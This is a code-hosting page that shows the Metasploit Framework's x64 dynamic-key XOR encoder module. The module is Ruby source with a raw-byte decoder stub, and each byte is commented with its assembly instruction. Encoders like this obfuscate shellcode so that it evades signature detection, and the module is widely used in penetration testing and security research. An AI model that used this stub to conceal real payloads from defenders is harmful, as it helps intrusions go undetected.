Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x64/xor_dynamic.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::XorDynamic67def initialize8super(9'Name' => 'Dynamic key XOR Encoder',10'Description' => 'An x64 XOR encoder with dynamic key size',11'Author' => [ 'lupman', 'phra' ],12'Arch' => ARCH_X64,13'License' => MSF_LICENSE14)15end1617# Indicate that this module can preserve some registers18# ...which is currently not true. This is a temp fix19# until the full preserve_registers functionality is20# implemented.21def can_preserve_registers?22true23end2425def stub26"\xeb\x27" + # jmp _call27"\x5b" + # _ret: pop rbx28"\x53" + # push rbx29"\x5f" + # pop rdi30"\xb0\x41" + # mov al, 'A'31"\xfc" + # cld32"\xae" + # _lp1: scas al, BYTE PTR es:[rdi]33"\x75\xfd" + # jne _lp134"\x57" + # push rdi35"\x59" + # pop rcx36"\x53" + # _lp2: push rbx37"\x5e" + # pop rsi38"\x8a\x06" + # _lp3: mov al, BYTE PTR [rsi]39"\x30\x07" + # xor BYTE PTR [rdi], al40"\x48\xff\xc7" + # inc rdi41"\x48\xff\xc6" + # inc rsi42"\x66\x81\x3f\x42\x42" + # cmp WORD PTR [rdi], 'BB'43"\x74\x07" + # je _jmp44"\x80\x3e\x41" + # cmp BYTE PTR [rsi], 'A'45"\x75\xea" + # jne _lp346"\xeb\xe6" + # jmp _lp247"\xff\xe1" + # _jmp: jmp rcx48"\xe8\xd4\xff\xff\xff" # _call: call _ret49end5051def stub_key_term52/A/53end5455def stub_payload_term56/BB/57end58end596061